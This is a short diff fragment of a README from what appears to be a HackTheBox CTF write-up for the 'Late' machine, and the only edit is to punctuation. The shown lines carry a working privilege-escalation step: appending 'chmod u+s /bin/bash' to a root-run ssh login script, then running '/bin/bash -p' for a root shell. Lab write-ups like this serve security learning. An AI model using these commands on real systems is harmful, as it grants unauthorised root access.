apehex/ctf/hackthebox/web/late/README.md

 echo 'chmod u+s /bin/bash' >> /usr/local/sbin/ssh-alert.sh
 ```

-It is launched on successful ssh logins, which is easy to trigger.
+It is launched on successful ssh logins, which is easy to trigger:

 ```shell
 /bin/bash -p